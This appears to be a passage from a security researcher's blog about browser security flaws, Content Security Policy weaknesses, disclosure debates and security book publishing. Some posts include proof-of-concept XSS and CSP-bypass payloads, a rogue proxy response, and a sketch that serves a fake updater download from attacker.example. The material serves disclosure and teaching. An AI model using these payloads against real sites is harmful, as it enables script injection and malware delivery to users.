  • It collects information without breaking immersion. This is done by alternating between "real" and "probe" asteroids. The real ones are always visible and are targeted at the spaceship; if you don't take them down, the game ends. The "probe" asteroids, which may or may not be visible to the user depending on browsing history, seem as if they are headed for the spaceship, too - but if not intercepted, they miss it by a whisker.

  • It is remarkably high-bandwidth. Although the PoC tests only a handful of sites, it's possible to test hundreds of URLs in parallel by generating a very high number of "probe" asteroids at once. A typical user will have visited only a small, scattered subset of any sufficiently large data set, so only a tiny fraction of probes would be visible on the screen. In fact, the testing could be easily rate-limited based on how frantic the user's mouse movements have been in the past second or so.

  • It's pretty reliable due to the built-in "corrective mechanisms" for poor players.

February 20, 2013

Firefox: HTTPS and response code 407

Today's release of Firefox 19.0 fixes an interesting bug that I reported to the vendor back in October 2012. In essence, an attacker on an untrusted network could first coerce the browser to use a rogue HTTP proxy (this can be done by leveraging the WPAD protocol); wait until the browser attempts to download a HTTPS document from an interesting site through said proxy; and then selectively respond to the appropriate CONNECT request with a plain-text message such as this:

  HTTP/1.0 407 Boink
  Proxy-Authenticate: basic
  Connection: close
  Content-Type: text/html

  <html>
  <h1>Hi, mom!</h1>
  <script>alert(location.href)</script>
  [...additional padding follows...]

The browser would show the user a cryptic authentication prompt - but hitting ESC or pressing cancel would inevitably result in the proxy-supplied plain-text document being rendered in the same-origin context of the requested HTTPS site. There goes the transport security - so I guess that's an oops? :-)

February 14, 2013

Boring non-security updates strike again!

My next book is coming out probably by the end of the year, and the remaining three readers should not be expecting frequent updates to this blog until then :-) Nevertheless, here are several tidbits not related to security in any way. If this sort of stuff floats your boat, you may also want to follow me on G+. In a couple of weeks, I should have several interesting browser bugs to share. Until then, carry on!

November 16, 2012

Lessons in history

Good news - I'm working on another book!

In the meantime, here's an interesting and forgotten page from the history of JavaScript that I stumbled upon thanks to Tavis. It's a long read, edited a bit for clarity; it's also a fascinating account of how close we came to replacing the same-origin policy - its faults notwithstanding - with something much worse:

"The security model adopted by Navigator 2.0 and 3.0 is functional, but suffers from a number of problems. The [same-origin policy] that prevents one script from reading the contents of a window from another server is a particularly draconian example. This [policy] means that I cannot write a [web-based debugger] and post it on my web site for other developers to use [in] their own JavaScript. [Similarly, it] prevents the creation of JavaScript programs that crawl the Web, recursively following links from a given starting page."

"Because of the problems with [the same-origin policy], and with the theoretical underpinnings of [this class of security mechanisms], the developers at Netscape have created an entirely new security model. This new model is experimental in Navigator 3.0, and may be enabled by the end user through a procedure outlined later in this section. The new security model is theoretically much stronger, and should be a big advance for JavaScript security if it is enabled by default in Navigator 4.0."

"[Let's consider] the security problem we are worried about in the first place. For the most part, the problem is that private data may be sent across the Web by malicious JavaScript programs. The [SOP approach] patches this problem by preventing JavaScript programs from accessing private data. Unfortunately, this approach rules out non-malicious JavaScript [code that wants to use this data] without exporting it."

"Instead of preventing scripts from reading private data, a better approach would be to prevent them from exporting it, since this is what we are trying to [achieve] in the first place. If we could do this, then we could lift most of the [restrictions] that were detailed in the sections above."

"This is where the concept of data tainting comes in. The idea is that all JavaScript data values are given a flag. This flag indicates if the value is "tainted" (private) or not. [Tainted values will be prevented] from being exported to a server that does not already "own" it. [...] Whenever an attempt to export data violates the tainting rules, the user will be prompted with a dialog box asking them whether the export should be allowed. If they so choose, they can allow the export."

Of course, tainting would not have prevented malicious JavaScript from relaying the observations about the tainted data to parties unknown.

June 08, 2012

This page is now certified

Oh, you're welcome.

(Yeah, I made these.)

May 30, 2012

Yes, you can have fun with downloads

It is an important and little-known property of web browsers that one document can always navigate other, non-same-origin windows to arbitrary URLs; in more limited circumstances, even individual frames can be targeted. I discuss the consequences of this behavior in The Tangled Web - and several months ago, I shared an amusing proof-of-concept illustrating the perils of this logic. Today, I wanted to showcase a more sneaky consequence of this design - and depending on who you ask, one that is possibly easier to prevent.

What's the issue, then? Well, it's pretty funny: predictably but not very intuitively, the attacker may initiate such cross-domain navigation not only to point the targeted window to a well-formed HTML document - but also to a resource served with the Content-Disposition: attachment header. In this scenario, the address bar of the targeted window will not be updated at all - but a rogue download prompt will appear on the screen, attached to the targeted document.
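To make the mechanics concrete, here is a hedged sketch of the two halves of the attack; the host names, the file name, and the helper function are illustrative, not taken from the original PoC:

```javascript
// Sketch of a rogue cross-window download (all names illustrative).

// 1) Server side: the response headers that turn a navigation into
//    a download prompt instead of a page load.
function attachmentHeaders(filename) {
  return {
    'Content-Type': 'application/octet-stream',
    'Content-Disposition': 'attachment; filename="' + filename + '"',
  };
}

// 2) Client side (browser-only): open a window on the victim site,
//    then navigate it cross-origin to the attachment URL. The address
//    bar keeps showing the victim origin, but a download prompt
//    appears, attached to the victim's window:
//
//   const win = window.open('https://victim.example/');
//   setTimeout(() => {
//     win.location = 'https://attacker.example/flash11_updater.exe';
//   }, 3000);
```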

Here's an example of how this looks in Chrome; the fake flash11_updater.exe download, supposedly served by the targeted site, is in reality supplied by the attacker:

All the top three browsers are currently vulnerable to this attack; some provide weak cues about the origin of the download, but in all cases, the prompt is attached to the wrong window - and the indicators seem completely inadequate.

You can check out the demo here:

The problem also poses an interesting challenge to sites that frame gadgets, games, or advertisements from third-party sources; even HTML5 sandboxed frames permit the initiation of rogue downloads (oops!).

Vendor responses, for the sake of posterity:

  • Chrome: reported March 30 (bug 121259). Fix planned, but no specific date set.

  • Internet Explorer: reported April 1 (case 12372gd). The vendor will not address the issue with a security patch for any current version of MSIE.

  • Firefox: reported March 30 (bug 741050). No commitment to fix at this point.
I think these responses are fine, given the sorry state of browser UI security in general; although in good conscience, I can't dismiss the problem as completely insignificant.

April 09, 2012

Well, I'm in a bit of a pickle...

I can't yet publish an interesting bug I hoped to share; I also don't want to rehash my earlier points about vulnerability trade, even as the debate has flared up again, thanks to the unfashionably late attention from Forbes and EFF.

So what I wanted to do instead is, once again, annoy the few remaining readers with my hobbyist work. Specifically, I wanted to showcase three things:

  • Omnibot, an interesting robot with a reconfigurable drivetrain,
  • Cycloidal drive, a mini-project to make an unorthodox type of transmission,
  • Adventures in CNC, my semi-humorous summary of my experiences with home manufacturing.
Sorry about that, and may fortune be with you from now on!

February 12, 2012

It's this time of the year again

Yeah, welcome to the 2012 edition of the full disclosure debate!

As usual, there are reasonable people who disagree about the merits of non-coordinated disclosure; a more recent trend is to debate the value of developing and publishing exploits, even for already patched bugs. The short-term risks are pretty clear to any sensible person: there is robust data to show that the availability of functioning exploits drives a good chunk of low-tier, large-scale attacks.

The long-term benefits are more speculative. I like to think of it as a necessary evil: non-disclosure does not prevent sophisticated and resourceful attackers from developing their own exploits and going after high-value targets, but it quickly leads to complacency when it comes to fixing the underlying problems and monitoring your infrastructure. We would not have Windows Update, silent autoupdates in Chrome, or MacOS X ASLR improvements were it not for the constant stream of public exploits and the accompanying attacks.

The cost-benefit calculation here is mostly a matter of personal taste, and we won't be able to settle it any time soon. I'm a bit on the fence, too: I am at best ambivalent about the merits of exploit packs and frameworks such as CORE Impact or Metasploit. I am also deeply uncomfortable with exploit trading, a trend all-too-eagerly embraced and supported by the industry.

But the merits of the debate aside, there is a disturbing propensity for parties who struggled with security response, and have sometimes adopted openly hostile tactics to suppress security research, to be on the front lines of the anti-disclosure movement. This is why I couldn't help but find parallels between Brad Arkin's recent statements, and a position taken ten years ago by Scott Culp. Brad says:

"My goal isn't to find and fix every security bug. I'd like to drive up the cost of writing exploits. But when researchers go public with techniques and tools to defeat mitigations, they lower that cost. [...] Too much attention is being paid these days to responding to vulnerability reports instead of focusing on blocking live exploits."

"[We need to] work closer with the research community to curb the publication of information that can help malicious hackers. [...] Something hard becomes very very easy. These exploits and techniques are copied, adapted and modified very cheaply."

We all agree that bug-free products are not a realistic goal, but reducing the availability of information is probably also an ill-advised one. If it's still possible to write an exploit, and just "expensive" to do so - for example, because the knowledge of how to bypass ASLR is not common - then indeed, unskilled attackers will be less likely to go after your mom's credit card information; but going after her bank will be fair game.

As for unintended consequences: in this scenario, the bank no longer has to deal with a steady stream of nuisance malware, so they probably care less about patching and monitoring, and the attacker is more likely to succeed.

Sure, one shouldn't be running on a vulnerability response treadmill. We can escape it to some extent simply by making the process more agile and lightweight. It is also very important to reduce the likelihood of malicious exploitation, but we should do so by tweaking factors other than the "cost" of acquiring domain-specific knowledge. We should embrace proactive approaches such as sensible coding practices, developer education, fuzzing, or tools such as ASLR, JIT randomization, and sandboxing - and when something slips through the cracks, we need to be thankful for the data point and simply make our solution more robust. Let's not obsess about what specific flavor of disclosure policies the researchers believe in: they haven't sold it to the highest bidder, and that's already pretty good.

"We have patched hundreds of CVEs over the last year. But, very, very few exploits have been written against those vulnerabilities. Over the past 24 months, we’ve seen about two dozen actual exploits."

That's a frighteningly high number of exploits, by the way.

January 10, 2012

p0f is back!

I decided to spend some time rewriting and greatly improving my ancient but strangely popular passive fingerprinting tool. Version 3 is a complete rewrite, bringing you much improved SYN and SYN+ACK fingerprinting capabilities, auto-calibrated uptime measurements, completely redone databases and signatures, a new API design, IPv6 support (who knows, maybe it even works?), stateful traffic inspection with thorough cross-correlation of collected data, application-level fingerprinting modules (for HTTP now, more to come), and a lot more.

December 19, 2011

Notes about the post-XSS world

Content Security Policy is gaining steam, and we've seen a flurry of other complementary approaches that share a common goal: to minimize the impact of markup injection vulnerabilities by preventing the attacker from executing unauthorized JavaScript. We are so accustomed to thinking about markup injection in terms of cross-site scripting that we don't question this approach - but perhaps we should?

This collection of notes is a very crude thought experiment in imagining the attack opportunities in a post-XSS world. The startling realization I had by the end of that half-baked effort is that the landscape would not change that much: The hypothetical universal deployment of CSP places some additional constraints on what you can do, but the differences are not as substantial as you may suspect. In that sense, the frameworks are conceptually similar to DEP, stack canaries, or ASLR: They make your life harder, but reliably prevent exploitation far less frequently than we would have thought.

Credit where credit is due: The idea for writing down some of the possible attack scenarios comes from Mario Heiderich and Elie Bursztein, who are aiming to write a more coherent and nuanced academic paper on this topic, complete with vectors of their design, and some very interesting 0-day bugs; I hope to be able to contribute to that work. In the meantime, though, it seems that everybody else is thinking out loud about the same problems - including Devdatta Akhawe and Collin Jackson - so I thought that sharing the current notes may be useful, even if the observations are not particularly groundbreaking.

December 10, 2011

X-Frame-Options, or solving the wrong problem

On modern computers, JavaScript allows you to exploit the limits of human perception: you can open, reposition, and close browser windows, or load and navigate away from specific HTML documents, without giving the user any chance to register this event, let alone react consciously.

I have discussed some aspects of this problem in the past: my recent entry showcased an exploit that flips between two unrelated websites so quickly that you can't see it happening; and my earlier geolocation hack leveraged the delay between visual stimulus and premeditated response to attack browser security UIs.

A broader treatment of these problems - something that I consider to be one of the great unsolved problems in browser engineering - is given in "The Tangled Web". But today, I wanted to showcase another crude proof-of-concept illustrating why our response to clickjacking - and the treatment of it as a very narrow challenge specific to mouse clicks and <iframe> tags - is somewhat short-sighted. So, without further ado:

There are more complicated but comprehensive approaches that may make it possible for web applications to ensure that they are given a certain amount of non-disrupted, meaningful screen time; but they are unpopular with browser vendors, and unlikely to fly any time soon.

December 08, 2011

The old switcharoo

Another tiny proof-of-concept for the day. While the idea is fairly trivial, it seems pretty frightening to me - and neatly illustrates one of the points I'm making in The Tangled Web. I highly doubt that even the most proficient and attentive users would be able to spot this happening in the wild.

(If you don't get it, try again, and follow instructions on the screen.)

Interesting results can be also achieved in some browsers with history.back(), but I'll leave this as an exercise for readers. The same goes for the implications it has for clickjacking, drag-and-drop, and other attacks normally associated with frames.

PS. Another silly proof-of-concept as a bonus: click here.

December 02, 2011

CSS :visited may be a bit overrated

OK, second time is a charm. This script is probably of some peripheral interest. In the past two years or so, a majority of browser vendors decided to take the drastic step of severely crippling CSS :visited selectors in order to prevent websites from stealing your browsing history.

It is widely believed that techniques such as cache timing may theoretically offer comparable insights, but the attacks demonstrated so far seemed unconvincing. Among other faults, they relied on destructive, one-shot testing that altered the state of the examined cache; produced only probabilistic results; and were far too slow and noisy to be practically useful. Consequently, no serious attempts to address the underlying weakness have been made.

My proof of concept is fairly crude, and will fail for a minority of readers; but in my testing, it offers reliable, high-performance, non-destructive cache inspection that blurs the boundary between :visited and all the "less interesting" techniques.

November 15, 2011

"The Tangled Web" is out

Okay, okay, it's official. You can now buy The Tangled Web from Amazon, Barnes & Noble, and all the other usual retailers for around $30. You can also order directly from the publisher, in which case, discount code 939758568 gets you 30% off.

No Starch provides a complimentary, DRM-free PDF, Mobi, and ePub bundle with every paper copy; you can also buy e-book edition separately. Kindle and other third-party formats should be available very soon.

More info about the book itself, including a sample chapter, can be found on this page.

November 04, 2011

In praise of anarchy: metrics are holding you back

It is comforting to think about information security as a form of computer science - but the reality of securing complex enterprises is as unscientific as it gets. We can theorize about how to write perfectly secure software, but no large organization will ever be in a meaningful vicinity of that goal. We can also try to objectively measure our performance, and the resilience of our defenses - but by doing so, we casually stroll into a trap.

Why? I think there are two qualities that make all the difference in our line of work. One of them is adaptability - the capacity to identify and respond to new business circumstances and incremental risks that appear every day. The other is agility - the ability to make changes really fast. Despite its hypnotic allure, perfection is not a practical trait; in fact, I'm tempted to say that it is not that desirable to begin with.

Almost every framework for constructing security metrics is centered around that last pursuit - perfection. It may not seem that way, but it's usually the bottom line: the whole idea is to entice security teams to define more or less static benchmarks of their performance. From that follows the focus on continually improving the readings in order to demonstrate progress.

Many frameworks also promise to advance one's adaptability and agility, but that outcome is very seldom true. These two attributes depend entirely on having bright, inquisitive security engineers thriving in a healthy corporate culture. A dysfunctional organization, or a security team with no technical insight, will find false comfort in a checklist and a set of indicators - but will not be able to competently respond to the threats they need to worry about the most.

A healthy team is no better off: they risk being lulled into complacency by linking their apparent performance to the result of a recurring numerical measurement. It's not that taking measurements is a bad idea; in fact it's an indispensable tool of our trade. But using metrics as long-term performance indicators is a very dangerous path: they do not really tell you how secure you are, because we have absolutely no clue how to compute that. Instead, by focusing on hundreds of trivial and often irrelevant data points, they take your eyes off the new and the unknown.

And this brings me to the other concern: the existence of predefined benchmarks impairs flexibility. Quite simply, yesterday's approach, enshrined in quarterly statistics and hundreds of pages of policy docs, will always overstay its welcome. It's not that the security landscape is constantly undergoing dramatic shifts; but if you don't observe the environment and adjust your course and goals daily, the errors do accumulate... until there is no going back.

October 28, 2011

Good news, everyone!

No Starch Press just posted a sample chapter for The Tangled Web. You can grab the PDF here and see what it's all about. The book itself should be available by November 15; you can also preorder on Amazon.

If you don't know what this is all about, you can also head over to the home page of the book; but the bottom line is that I think it's the first-ever reasonably detailed examination of the browser security model and its evolution through the years - and really, that's something you just need to know to develop modern web apps.

PS. It's apparently always April Fools' at Microsoft!

October 02, 2011

An origin is forever

This post is inspired chiefly by the work of Artur Janc.

The Internet is a pretty seedy place, yet we are quite willing to hand over our secrets to a small group of trusted web apps. Heck, in recent years, we also started giving them capabilities: social networking sites often get to see your geolocation, and your instant messenger may be able to access your microphone or webcam feeds. Some of this does not even require your initial consent: certain browsers and plugins come with hardcoded domains that are permitted to install software updates, or change system settings at a whim.

The push toward web application capabilities is somewhat frightening once you realize that the boundaries between web applications are very poorly defined, and that nobody is trying to solve that uncomfortable problem first. Look at the scoping rules for JavaScript DOM access, for HTTP cookies, and for auxiliary mechanisms such as password managers: they not only differ substantially, but routinely interfere with each other in destructive ways. Compartmentalizing complex web applications should be a breeze, but instead, it's an impenetrable form of art.
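As a toy illustration of that mismatch, compare a simplified DOM origin check with simplified cookie domain matching; both functions are my own rough approximations, not actual browser code:

```javascript
// Rough approximations of two different scoping rules (not browser code).

// DOM access: scheme, host, and port must all match.
function sameOrigin(a, b) {
  const ua = new URL(a), ub = new URL(b);
  return ua.protocol === ub.protocol && ua.host === ub.host;
}

// Cookies: scheme and port are ignored, and domain suffixes match.
function cookieVisibleTo(cookieDomain, host) {
  return host === cookieDomain || host.endsWith('.' + cookieDomain);
}

// https://app.example.com and http://example.com are distinct origins,
// yet a cookie set with Domain=example.com reaches both of them.
```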

Worse, content isolation on the web is very superficial - so even if the boundaries can be drawn, most types of privileged contexts can't distance themselves from the rest of the world, and expose just a handful of well-defined APIs. Instead, every non-trivial web application needs to heavily compensate for the risk of clickjacking, cross-request forgery, reflected cross-site scripting, and dozens of other attacks of that sort. All the developers eventually fail, by the way: show me a domain with no history of XSS, and I will show you a web application nobody cares about.

Unlike some other tough challenges in browser engineering, the risks of living with privileged applications could be mitigated fairly nicely simply by requiring some effort up front: even without inventing any new security mechanisms, you could require applications to use origin cookies, have a sensible CSP policy, and use HSTS before being allowed to prompt for extra privileges. It's not impossible to do something meaningful - it's just unpopular with the creators of privileged APIs.

But the problems with the clarity or robustness of application boundaries aside, there is also a third, perhaps more fascinating issue: what do you do if your web application execution context becomes corrupted in some way? As it turns out, there is no mechanism for the server to say that from now on, it wants to have a clean slate, and that the browser should drop or at least isolate any already running code, or previously stored data.

This seemingly odd wish is actually critical to web application security. For example, let's assume there is an XSS vulnerability in a web mail system or a social networking application. Because of the convenient but unfortunate design of HTML, such vulnerabilities are unavoidable, but we seldom wonder if it's possible to cleanly and predictably recover from them. Intuitively, patching the underlying bug, invalidating session cookies, and perhaps forcing password change, is all it should take; in fact, applications using httponly cookies can often skip the last two steps.

Alas, a once-compromised web origin can stay tainted indefinitely. At the very minimum, the attacker is in full control for as long as the user keeps the once-affected website open in any browser window; with the advent of portable computers, it is not uncommon for users to keep a single commonly used website open for weeks. During that period, there is nothing the legitimate owner of the site can do - and in fact, there is no robust way to gauge if the infection is still going on. And hey, it gets better: if content from the compromised origin is commonly embedded on third-party pages (think syndicated "like" buttons or advertisements), with some luck, the attacker's JavaScript may become practically invincible, surviving the closure of the original application and the deletion of the browser cache. If that doesn't give you pause, it should.

And let's not forget open wireless networks: the problem there is about as bad. It does not matter that you are not logged into anything sensitive while visiting Starbucks. An invisible frame, a strategic write to localStorage, or a bit of DNS or cache poisoning, is all it takes for the attacker to automatically elevate his privileges the moment you return to a safe environment and log back in.
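The localStorage vector can be sketched in a few lines; the key name and payload are hypothetical, and the fake storage object below merely stands in for the browser API:

```javascript
// Sketch of localStorage poisoning from a transient network position.
// The key name and payload are hypothetical.

// Attacker-injected code, running once in the victim origin while the
// user is on an untrusted network:
function plant(storage) {
  storage.setItem('cached_widget', '<img src=x onerror="evil()">');
}

// Later, back on a safe network: legitimate app code that trusts its
// own localStorage re-injects the attacker's markup into the page.
function rehydrate(storage) {
  return storage.getItem('cached_widget');
}
```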

With all that, and with the proliferation of mechanisms such as web workers and offline apps, we are rapidly approaching a point where recovering from a trivial XSS bug and other common web security lapses is getting almost as punishing as recovering from RCE - and for no good reason, too. Sure: today, it's so easy to phish users or exploit real RCE bugs, that backdooring web origins is not worth the effort. But in a not-too-distant future, that balance may shift.

September 09, 2011

Critical (of) severity

You can tell when a person is desperate to appear authoritative: they often litter their speech with unnecessary, roundabout verbiage. To some listeners, this sounds smart. To many others, it's obtuse and pompous.

I think that one of the cornerstones of vulnerability management is just an example of that. I am talking about the concept of vulnerability severities: I believe that they serve no real purpose, other than obfuscating the true intent of speech.

It's not that we don't need a codified taxonomy; but the term "severity" and the abstract levels attached to it ("critical", "high", "medium", "low") are a remarkably poor proxy for what we actually want to say.

The notion of severity is used in two distinct settings:

  • In a position of authority: For example, when an internal security team is communicating with developers. In this case, the intent of assigning severity is to instruct the developer to do one of the following:

    • Drop all other work and fix the bug now.
    • Fix the issue in a couple of days.
    • Fix at own leisure, or not at all.

  • In an advisory position: Say, when a vendor is notifying end users about the availability of a fix. In this case, the actual message usually is any of the following:

    • You are in imminent danger. Patch now.
    • You are at a limited risk, but prompt action is advisable.
    • We don't think there is a substantial risk.
Every time, the messages are very simple. Yet, instead of just saying it out loud, we create one set of guidelines for the security team to map their assessment to an ambiguous codeword; and then furnish a second lengthy phrasebook for the final recipient of a message, to map the codeword to something they can act on.

Only we're not running a numbers station: we're trying to tell people something very important, and we need them to understand us right away. There is no way around the fact that terms such as "critical" or "high" intuitively mean different things to different people, and almost certainly not just the thing you actually wanted to say. If the severity needs to be accompanied with several pages of organization-specific explanatory text, something is horribly wrong.

Instead of "highly critical", just start telling your users "patch right away".

August 29, 2011

So you want to write a security book?

Now that I am done with my side project, I wanted to post a note about something that my colleagues frequently ask about: the reality of publishing a security-themed book.

The most important advice I can give is to start with a reality check: writing for technical audiences will probably not make you rich. You will invest somewhere between 200 and 1,000 hours of work over the course of several months. In the next two years, you will likely sell from 1,000 to 50,000 copies (10,000 is pretty good already). Your cut is between $2 and $5 per copy (that's 10-20% of the actual sale price, which in turn is usually around 50% of the cover price); proportionally less if there are multiple authors involved.
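To put those ranges in perspective, here is a quick back-of-the-envelope calculation. All the inputs are illustrative midpoints of the figures quoted above, not real contract terms:

```python
# Rough earnings estimate; every number below is an assumed midpoint.
cover_price = 40.0                  # hypothetical cover price
sale_price = cover_price * 0.5      # actual sale price is ~50% of cover
royalty = sale_price * 0.15         # author's cut: 10-20% of sale price
copies = 10_000                     # "pretty good already"
hours = 600                         # somewhere in the 200-1,000 range

total = royalty * copies
hourly = total / hours
print(f"${royalty:.2f}/copy, ${total:,.0f} total, ${hourly:.0f}/hour")
```

Even under these fairly optimistic assumptions, the effective hourly rate lands well below typical consulting fees - which is the whole point.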

The bottom line is that your motivation needs to be something other than money. If there are no quality, up-to-date reference materials in your field of expertise, or if you just have something interesting to share, go for it. If you just want to earn some cash, random consulting gigs would net you more.

If you are still serious about the plan, the next step is choosing between a traditional publisher, and doing all the work yourself. I recommend the former. There are some reputable self-published security books (say, Fyodor's), and if you pursue this route, you will be able to get a slightly larger slice of the revenue pie. That said, you lose some important benefits:

  • You will not get professional editorial feedback. Having an independent sanity check from a person who publishes books for a living helps you set the style and flow of the chapters, and arrange them reasonably. This is harder than it seems. Even the best ideas look bad when presented poorly.

  • You will have to take care of technical illustrations, page layout, indexes, and so on - requiring some talent, and easily adding 50-100 hours of work into the mix.

  • You will have to pay for technical editing and proofreading - or ship the book with typos and grammar errors, which never helps.

  • You will have to invest some effort into marketing, accounting, etc.
If you have a decent proposal, you can approach publishers out of the blue and pick the one you want to work with; for the time being, the demand for infosec authors seems to be higher than the supply. All the publishers will offer you roughly the same financial terms, but there are some interesting differences in what you get in return. I know quite a few authors who signed up with one of the major publishing houses and are very unhappy about not receiving any editorial attention past the first chapter or two, or about not being able to get an illustrator assigned to the project and having to do the work themselves. In such cases, one has to wonder what the publisher is doing to earn its fees.

So, ask around. For example, in comparison to said publisher, my experiences with No Starch Press have been very good.

August 26, 2011

The subtle / deadly problem with CSP

Content Security Policy is a promising new security mechanism deployed in Firefox, and on its way to WebKit. It aims to be many things - but its most important aspect is the ability to restrict the permissible sources of JavaScript code in the policed HTML document. In this capacity, CSP is hoped to greatly mitigate the impact of cross-site scripting flaws: the attacker will need to find not only a markup injection vulnerability, but also gain the ability to host a snippet of malicious JavaScript in one of the whitelisted locations. Intuitively, that second part is a much more difficult task.

Content Security Policy is sometimes criticized on the grounds of its complexity, potential performance impact, or its somewhat ill-specified scope - but I suspect that its most significant weakness lies elsewhere. The key issue is that the granularity of CSP is limited to SOP origins: that is, you can permit scripts from a specific origin, or perhaps from a wildcard such as * - but you can't be any more precise. I am fairly certain that in a majority of real-world cases, this will undo many of the apparent benefits of the scheme.
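To make the granularity problem concrete, a script-restricting policy in the header syntax might look like this (example.com is a placeholder; early Firefox builds used the experimental X-Content-Security-Policy header name instead):

```
Content-Security-Policy: script-src 'self' https://scripts.example.com
```

Note that every source expression is an origin or a wildcard over origins - nothing in this grammar lets the author narrow the whitelist down to a specific path or an individual script file.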

To understand the problem, it is important to note that in modern times, almost every single domain hosts dozens of largely separate web applications consisting of hundreds of unrelated scripts - quite often including normally inactive components used for testing and debugging needs. In this setting, CSP will prevent the attacker from directly injecting his own code on the vulnerable page - but will still allow him to put the targeted web application in a dangerously inconsistent state, simply by loading select existing scripts in the incorrect context or in an unusual sequence. The history of vulnerabilities in non-web software strongly implies that program state corruption flaws will be exploitable more often than we may be inclined to suspect.

If that possibility is unconvincing, consider another risk: the attacker loading a subresource that is not a genuine script, but could be plausibly mistaken for one. Examples of this include a user-supplied text file, an image with a particular plain-text string inside, or even a seemingly benign XHTML document (thanks to E4X). The authors of CSP eventually noticed this unexpected weakness, and decided to plug the hole by requiring a whitelisted Content-Type for any CSP-controlled scripts - but even this approach may be insufficient. That's because of the exceedingly common practice of offering publicly-reachable JSONP interfaces for which the caller has the ability to specify the name of the callback function, e.g.:

GET /store_locator_api.cgi?zip=90210&callback=myResultParser HTTP/1.0

HTTP/1.0 200 OK
Content-Type: application/x-javascript
myResultParser({ "store_name": "Spacely Space Sprockets",
                 "street": ... });
Having such an API anywhere within a CSP-permitted origin is a sudden risk, and may be trivially leveraged by the attacker to call arbitrary functions in the code (perhaps with attacker-dependent parameters, too). Worse yet, if the callback string is not constrained to alphanumerics – after all, until now, there was no compelling reason to do so – specifying callback=alert(1);// will simply bypass CSP right away.
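The bypass can be simulated outside the browser. The sketch below models a naive JSONP endpoint that interpolates the callback parameter verbatim; the endpoint shape and function names are made up for illustration:

```python
import re

def jsonp_response(callback: str) -> str:
    # A naive JSONP endpoint: the callback parameter is interpolated
    # verbatim, with no character whitelist -- the pattern described above.
    data = '{ "store_name": "Spacely Space Sprockets" }'
    return f"{callback}({data});"

# Legitimate use: the response calls the named parser function.
print(jsonp_response("myResultParser"))

# CSP bypass: the "callback" is a complete attacker-chosen statement,
# served as a script type from a whitelisted origin. The trailing //
# comments out the rest of the response.
print(jsonp_response("alert(1);//"))

def is_safe_callback(name: str) -> bool:
    # Constraining callbacks to identifier-like strings (one possible
    # server-side fix) rejects the payload outright.
    return re.fullmatch(r"[A-Za-z_][A-Za-z0-9_.]*", name) is not None
```

The second response begins with `alert(1);//(`, i.e. the attacker's statement executes and the JSON payload is commented out - exactly the `callback=alert(1);//` trick described above.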

The bottom line is that CSP will require web masters not only to create a sensible policy, but also thoroughly comb every inch of the whitelisted domains for a number of highly counterintuitive but potentially deadly irregularities like this. And that's the tragedy of origin scoping: if people were good at reviewing their sites for subtle issues, we would not be needing XSS defenses to begin with.

April 09, 2011

Using View > Encoding can kill you (in a manner of speaking)

Here's an interesting tidbit: you should never use the View > Encoding menu in any browser unless you fully trust the visited website.

Picking an alternative encoding through that menu overrides the character set not only for the top-level document, but also for all the nested frames - even if they happen to be cross-domain or hidden from view. And that may very well enable the owner of the visited page to carry out an XSS attack against a random third-party application without your knowledge.

Most security researchers associate encoding-related XSS problems with UTF-7, a somewhat preposterous and unnecessary encoding scheme that, by design, allows overlong encoding of 7-bit ASCII values (with disastrous consequences for HTML parsing). Not all browsers support UTF-7, and users are not likely to make that choice in the aforementioned menu. So, we're fine, right?

Well, not exactly. Many other, still popular multi-byte encodings, including Shift JIS or EUC-*, are also fairly problematic: their parsers often suffer from character consumption bugs, and in contrast to UTF-8, relatively little attention has been given to cleaning this up.

For example, with forced Shift JIS, this input is likely to be exploitable:

<img src="[0xE0]">
  ...this is still a part of the markup...
  " onerror="alert('Hi mom!')" x="
Simple demo here.
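The consumption behavior can be simulated with a deliberately naive model of a lenient decoder (this is a sketch of the failure mode, not any particular browser's implementation):

```python
def lenient_decode(data: bytes) -> str:
    # Naive model of a lenient Shift JIS decoder: on seeing a lead byte
    # (0x81-0x9F or 0xE0-0xFC), it blindly swallows the next byte as a
    # trail byte -- even when that byte is a structurally significant
    # ASCII character such as a double quote.
    out, i = [], 0
    while i < len(data):
        b = data[i]
        if (0x81 <= b <= 0x9F or 0xE0 <= b <= 0xFC) and i + 1 < len(data):
            out.append("\ufffd")   # two input bytes, one output character
            i += 2
        else:
            out.append(chr(b))
            i += 1
    return "".join(out)

payload = b'<img src="\xe0">\n" onerror="alert(\'Hi mom!\')" x="'
decoded = lenient_decode(payload)
```

After decoding, the 0xE0 byte has swallowed the quote that was meant to close src="...", so the attribute value keeps running until the quote on the next line - and onerror lands in live markup context.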

March 12, 2011

Pwn2own considered (somewhat) harmful

I think that hacking challenges and bug bounty programs can be extremely valuable. This is true when they involve transparent, sustained efforts to evaluate the security of a particular platform. For example, I believe that there is a substantial value in Mozilla bug bounties, or in the Chrome reward program. These programs greatly improve the security of the browsers in question, occasionally advance our understanding of web security, and provide tons of statistical data about vendor response processes and attitudes toward security flaws. That last part is arguably the most important metric when dealing with code so complex that for better or worse, it is unlikely to ever be perfectly safe.

I also think that Pwn2own, an annual browser hacking contest run by TippingPoint, does not deliver the same value. The formula of the contest boils down to this: once a year, a single, secretly developed exploit is exchanged for a substantial amount of money. No information about the flaw or its back story is revealed in the process, and given that this trade is negligible in comparison to the annual volume of browser vulnerabilities, there is absolutely no intrinsic value in observing it.

That, alone, is not a compelling criticism; at best, it's a reason not to watch. But then, there are some negative consequences, too: it is in the interest of the conference and contest organizers, and the participating researchers, to get publicity for their findings - and journalists, who do not necessarily have a holistic view of the day-to-day browser security research, embrace such high-profile developments with disproportionate enthusiasm. The resulting ecstatic press coverage ultimately undermines any attempt to have a meaningful and reasonable discussion about the state of browser security.

Take this quote, which likely will be repeated in every Safari-related story for the next twelve months:

"A team was able to exploit Safari to exploit a MacBook Air in five seconds. Yes, five seconds - less time than it takes most people just to type 'Safari got hacked in less than five seconds'."

That's remarkable, but also completely wrong. It takes days or weeks to find and exploit a vulnerability, and Pwn2own is no exception: the actual exploits are prepared months or weeks in advance, and simply executed on the day the contest takes place. I do not think there is a single person in the information security industry who would say that the discovery of a normal browser vulnerability is a notable event: several hundred such flaws are discovered and resolved every year in every browser, as evidenced by release notes maintained by the vendors with varying degrees of accuracy. Neither the fact that somebody discovered a vulnerability before Pwn2own, nor that this person needed five seconds to execute that pre-made code, is a useful measure of anything.

Similarly, the survival of Firefox and Chrome intuitively makes me happy, because I know that these browsers give a lot of thought to security - but I do not think that Pwn2own is a meaningful testament to this. Perhaps these two vendors merely patched up the vulnerability somebody wanted to use, and there was not enough time to find a new one. Or perhaps nobody attending the event (which brings together only a tiny fraction of the infosec community) had the expertise and the inclination to target this particular browser.

